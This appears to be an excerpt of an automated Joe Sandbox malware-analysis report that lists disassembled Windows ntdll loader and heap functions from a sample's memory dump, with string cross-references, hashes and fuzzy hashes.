                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: 8ca857e5e188c4486f69854a121ee43fceabab1354c1d655db85248e366cc79b
                                                                        • Instruction ID: d29c4452f93e33fc5aecd72db55028980cfb788f00223fa72561b286aa096e15
                                                                        • Opcode Fuzzy Hash: 8ca857e5e188c4486f69854a121ee43fceabab1354c1d655db85248e366cc79b
                                                                        • Instruction Fuzzy Hash: A3915B70B017559BEB39DF98DA84FEA7BB9BF44B24F04012DEA046B2C2D7789841C791
                                                                        Function 01A7645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpInitShimEngine, xrefs: 01AD99F4, 01AD9A07, 01AD9A30
                                                                        • apphelp.dll, xrefs: 01A76496
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AD9A11, 01AD9A3A
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AD9A01
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AD99ED
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AD9A2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-204845295
                                                                        • Opcode ID: ac9ceef5dfcbd6a792eba208f2d558e4095fec9e94a3911735b6ad9b8b7795a1
                                                                        • Instruction ID: 00277499312b7271f2939f629df38a002586fffd546cfdb2b893202eca29350f
                                                                        • Opcode Fuzzy Hash: ac9ceef5dfcbd6a792eba208f2d558e4095fec9e94a3911735b6ad9b8b7795a1
                                                                        • Instruction Fuzzy Hash: 16518171208705AFE721DF24DD41BAB77E8FB84644F04091DF58A971A1D730EA45DB93
                                                                        Function 01ABC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01AF8170
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01ABC6C3
                                                                        • LdrpInitializeImportRedirection, xrefs: 01AF8177, 01AF81EB
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AF81E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AF8181, 01AF81F5
                                                                        • LdrpInitializeProcess, xrefs: 01ABC6C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 51cecc09ae2bf6639195d398b4de2a325334cb861add01654406a7c0f1f3c45b
                                                                        • Instruction ID: c99ea9011d4453c251b643dcc5dae4ad549aa06a07ae37cb3912011e7d993135
                                                                        • Opcode Fuzzy Hash: 51cecc09ae2bf6639195d398b4de2a325334cb861add01654406a7c0f1f3c45b
                                                                        • Instruction Fuzzy Hash: 1D31F571644742AFD224EF69DD85E2AB7E8FF94B20F04055CF944AB2A1E720EC04C7A2
                                                                        Function 01AB2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01AF2160, 01AF219A, 01AF21BA
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AF2180
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AF2165
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AF2178
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AF21BF
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AF219F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 39313b4ff7afd156ff28edfa16c618df03c4ebf43e1458cf68dd8d0d6b8f4dfe
                                                                        • Instruction ID: 8d92a6f596c524bc51de6d9f6f17684d51f8e63097692b953730c33d53414560
                                                                        • Opcode Fuzzy Hash: 39313b4ff7afd156ff28edfa16c618df03c4ebf43e1458cf68dd8d0d6b8f4dfe
                                                                        • Instruction Fuzzy Hash: 13313736B4031577EB228ADA8C81FAA7A7CEB65A44F09005FBB04B7141D370EE41C6A8
                                                                        Function 01AC096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01AC2DF0: LdrInitializeThunk.NTDLL ref: 01AC2DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 99e5aaa0176f5b7c1bf0e742663d8f160aeae6cc6e44a987ff542a82cdf5d65f
                                                                        • Instruction ID: f0074c4266fe82568c68df7032beaf674d637b5323b12611abf4edb064755527
                                                                        • Opcode Fuzzy Hash: 99e5aaa0176f5b7c1bf0e742663d8f160aeae6cc6e44a987ff542a82cdf5d65f
                                                                        • Instruction Fuzzy Hash: DB426B75900715DFDB21CF68C980BAAB7F4BF04714F1445AEEA99EB241E770AA84CF60
                                                                        Function 01A8A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: b006ea8d6f8fce31266ded0a3844306fc37bd8652988aadb8c87db719dc2e69b
                                                                        • Instruction ID: efab07032a2042f627b299123ed15d10e028a57ca003387456d5ffe31db47ffb
                                                                        • Opcode Fuzzy Hash: b006ea8d6f8fce31266ded0a3844306fc37bd8652988aadb8c87db719dc2e69b
                                                                        • Instruction Fuzzy Hash: 2AC18B74108382CFDB25EF68C144B6AB7F4FF84704F04486AF9968B251E738CA49CB66
                                                                        Function 01AB8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AB8421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AB855E
                                                                        • @, xrefs: 01AB8591
                                                                        • LdrpInitializeProcess, xrefs: 01AB8422
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: d2bfd94da42ded5343cc6174403ea8f23af2f7e3ba0b26b2b3c4858f91559acc
                                                                        • Instruction ID: d26cff63efb63d03cead75dd912193e8bc229ec6725991c384a862218c7d460a
                                                                        • Opcode Fuzzy Hash: d2bfd94da42ded5343cc6174403ea8f23af2f7e3ba0b26b2b3c4858f91559acc
                                                                        • Instruction Fuzzy Hash: D3917E71548385AFD721EF69CD80FABBAECFF84754F40092EFA8492152E738D9448B52
                                                                        Function 01AB273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • .Local, xrefs: 01AB28D8
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AF21DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AF22B6
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AF21D9, 01AF22B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: 147c8ebd3de7a8132e28b414c746ab140b4d670e9db683c82ca2b0901d68c347
                                                                        • Instruction ID: 092133faa166b11314520251ee4333c59c945924d043fa42213750dde4058795
                                                                        • Opcode Fuzzy Hash: 147c8ebd3de7a8132e28b414c746ab140b4d670e9db683c82ca2b0901d68c347
                                                                        • Instruction Fuzzy Hash: 59A19F359002699BDB25CFA8C8C4BE9B7B5BF58354F1541EBE908E7252D730AE81CF90
                                                                        Function 01AB4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AF3456
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AF342A
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AF3437
                                                                        • RtlDeactivateActivationContext, xrefs: 01AF3425, 01AF3432, 01AF3451
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: 041b58d2ae56266ae811fc274fbd9fd943981cd2ac69477964085e3a0c814f35
                                                                        • Instruction ID: 361b0ecb120cf473cfe3e6af6ac39354bddfc80276c4ea0c90a70befb5dd6b06
                                                                        • Opcode Fuzzy Hash: 041b58d2ae56266ae811fc274fbd9fd943981cd2ac69477964085e3a0c814f35
                                                                        • Instruction Fuzzy Hash: A461F5366006529BDB22CF59C881B7AB7E9FF94B52F18851DFA569B243C730E801CB91
                                                                        Function 01A864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AE10AE
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AE106B
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AE0FE5
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AE1028
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: cdd1dcd7c8747cecc892b20e85556c169926c879adda2232a0eed9f73871f314
                                                                        • Instruction ID: 7f05d131e58b665bd6d81974e33d877ffe29ceeda34d880f71eab6b03e816a7c
                                                                        • Opcode Fuzzy Hash: cdd1dcd7c8747cecc892b20e85556c169926c879adda2232a0eed9f73871f314
                                                                        • Instruction Fuzzy Hash: BF71D2B1904305AFDB21EF28C984B9B7FA8EF54B64F440468F9498B246D734D588CBE2
                                                                        Function 01AA245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpDynamicShimModule, xrefs: 01AEA998
                                                                        • apphelp.dll, xrefs: 01AA2462
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AEA9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01AEA992
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: 00c093fc820ea75d05c5d036cb7f0ee30db8f23205ed16f1c1d8e473bfe2d6cf
                                                                        • Instruction ID: 955096cb5f1c305593f1d3f573b49ee91bfe6d2530a0aedeec63f88ed8ee0127
                                                                        • Opcode Fuzzy Hash: 00c093fc820ea75d05c5d036cb7f0ee30db8f23205ed16f1c1d8e473bfe2d6cf
                                                                        • Instruction Fuzzy Hash: 31313776600301EBEB31AF5DD989FBABBF4FB84B00F16405EE910A7255C7709981CB80
                                                                        Function 01A929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 01A93255
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A9327D
                                                                        • HEAP: , xrefs: 01A93264
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 2e833c973d835c92641ec66468144a00b89c95e02e6ebe34bf9917fa8b0c393d
                                                                        • Instruction ID: abbebdd6b6068b00afab5869137af15305bafd701f6dcba73db72bc97c34ac71
                                                                        • Opcode Fuzzy Hash: 2e833c973d835c92641ec66468144a00b89c95e02e6ebe34bf9917fa8b0c393d
                                                                        • Instruction Fuzzy Hash: A792BE71A042499FDF25CFA8C4847AEBBF1FF48310F18809AE959AB352D735A985CF50
                                                                        Function 01A90770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 3c6bb3ba9a3b401d21db85f8a6748cad582c9c6c6f64be7c1fac37eacf2731db
                                                                        • Instruction ID: 8d402009f21638f07932b09bb37163d2ca1cf8c32b24c8158af3ad54856c9f0e
                                                                        • Opcode Fuzzy Hash: 3c6bb3ba9a3b401d21db85f8a6748cad582c9c6c6f64be7c1fac37eacf2731db
                                                                        • Instruction Fuzzy Hash: FBF1BB34A00606DFEF25CF68D984B6ABBF9FF44344F1481A8E5169B381D734E981CB90
                                                                        Function 01AA6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        • Opcode ID: 77842a46c20f75d39de53fd2b3aa7c3523642da128ba0dd179d5ad5bd05065ce
                                                                        • Instruction ID: 2f604c9d81ce54396e133d99f27fd0b4895927ba809cfa703ed1c208571432a4
                                                                        • Opcode Fuzzy Hash: 77842a46c20f75d39de53fd2b3aa7c3523642da128ba0dd179d5ad5bd05065ce
                                                                        • Instruction Fuzzy Hash: 5CC2AF716083419FEB25CF68C881BABBBE5BF88714F48892DF989C7241D735D845CB92
                                                                        Function 01A7A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 3c8dde3e24b481289c527c95a228524dbbfc3f39e7c645f6274e370a8b76b426
                                                                        • Instruction ID: 9f52d73c6c34ab5a3c9fd5509730c284c809e146c316a95fe939abddef25a2fb
                                                                        • Opcode Fuzzy Hash: 3c8dde3e24b481289c527c95a228524dbbfc3f39e7c645f6274e370a8b76b426
                                                                        • Instruction Fuzzy Hash: AFA16D759116299BDB31DF68CD88BAAB7B8EF44710F0401EAE909A7250DB359F84CF90
                                                                        Function 01AA0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AEA121
                                                                        • LdrpCheckModule, xrefs: 01AEA117
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 01AEA10F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: 5f0c4bb8d6f0bb62d9b9ae9c77ec8df3b1a3507e3750b922b01103fe96fc08a4
                                                                        • Instruction ID: 6297698c779da1dbfa6261f10b20e3178695f7a9cda915f27589bdbf47b743e5
                                                                        • Opcode Fuzzy Hash: 5f0c4bb8d6f0bb62d9b9ae9c77ec8df3b1a3507e3750b922b01103fe96fc08a4
                                                                        • Instruction Fuzzy Hash: 3871BE71A00205DFDB25DF68CA85ABEBBF4FB84704F59402DE906EB251E734AD41CB50
                                                                        Function 01A90A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: e097be5effae8f2a0470624a7c027abf2f03b24c9457e6f3bf7fee21225a42d9
                                                                        • Instruction ID: 8f265f6ed2a13b12f17f42abc76763b218eb73c2f2de4363b63facbe08e5bd0e
                                                                        • Opcode Fuzzy Hash: e097be5effae8f2a0470624a7c027abf2f03b24c9457e6f3bf7fee21225a42d9
                                                                        • Instruction Fuzzy Hash: 4661F174600302DFDB29CF28D644B6ABBF5FF44348F18855AE4598F292D774E881CB90
                                                                        Function 01ABC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Failed to reallocate the system dirs string !, xrefs: 01AF82D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AF82E8
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 01AF82DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 9a011ea40ff9fafe03381b9bd07fd5bcca7d4a93847c88b439db3fa35d0f2adf
                                                                        • Instruction ID: b4bbaf3744f075d08113d01fff92ee5c858cbb024fd5466731fb9616979ee9c4
                                                                        • Opcode Fuzzy Hash: 9a011ea40ff9fafe03381b9bd07fd5bcca7d4a93847c88b439db3fa35d0f2adf
                                                                        • Instruction Fuzzy Hash: 2141E271544301ABDB21EB68DD84F9B7BE8FF44760F04492AFA48D32A5E774E840CB91
                                                                        Function 01B3C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 01B3C212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B3C1C5
                                                                        • @, xrefs: 01B3C1F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: a8b57c0dd651051372d91da20a9e0cdf314f518b11c262a12118ab4f8fe4a4b6
                                                                        • Instruction ID: ab6712440c2fd24dcf81c3d210da614b2e80536f1cc3d4e05821ecddb50480d3
                                                                        • Opcode Fuzzy Hash: a8b57c0dd651051372d91da20a9e0cdf314f518b11c262a12118ab4f8fe4a4b6
                                                                        • Instruction Fuzzy Hash: C0415372E00219EBDF15DED8CD51FEEBBB8EB54700F1441ABEA09B7240D7749A548B90
                                                                        Function 01B14144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: ef75be233066c0b2bce75d6a070e66afe575f9ac2ac026895ac5b495b25878b6
                                                                        • Instruction ID: fd33d3aefae4aa5b2d80ee09cfa5d50ea9eb2779b9ecbbebd852a91fe130f415
                                                                        • Opcode Fuzzy Hash: ef75be233066c0b2bce75d6a070e66afe575f9ac2ac026895ac5b495b25878b6
                                                                        • Instruction Fuzzy Hash: EF413631A00258CBEB2ADBE9C940BEDBBF8FF55340F650599D901EB789D7348941CB50
                                                                        Function 01B04755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B04888
                                                                        • LdrpCheckRedirection, xrefs: 01B0488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01B04899
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: f7b29fcdc9f12d2b48a13ad7117ff8f0de45d413cdeca05c5a1a9d73a3ef5644
                                                                        • Instruction ID: 4663e30f576946194dd10e26b63d6ddfd61b5df1490ddc56c02a03a260e775cf
                                                                        • Opcode Fuzzy Hash: f7b29fcdc9f12d2b48a13ad7117ff8f0de45d413cdeca05c5a1a9d73a3ef5644
                                                                        • Instruction Fuzzy Hash: 7541C132A047519FDB2BCE69D940A26BFE4FF89650F050ADDEF4897291D730D900CB91
                                                                        Function 01A90BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 9d62c1b1dcd24cf286b293e8e790466d6d18543ad9b1e16b1d8abd9bc715bab2
                                                                        • Instruction ID: d6db7c7edb7e9b2f878d6d0e869a595fed84ff4f36d390ecc8320bdf9b49af5c
                                                                        • Opcode Fuzzy Hash: 9d62c1b1dcd24cf286b293e8e790466d6d18543ad9b1e16b1d8abd9bc715bab2
                                                                        • Instruction Fuzzy Hash: 3711E1717141029FDB29DB29D948B7AB3EAEF40659F188119F406CB252DB30D880C750
                                                                        Function 01B020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpInitializationFailure, xrefs: 01B020FA
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01B02104
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 01B020F3
                                                                        Memory Dump Source
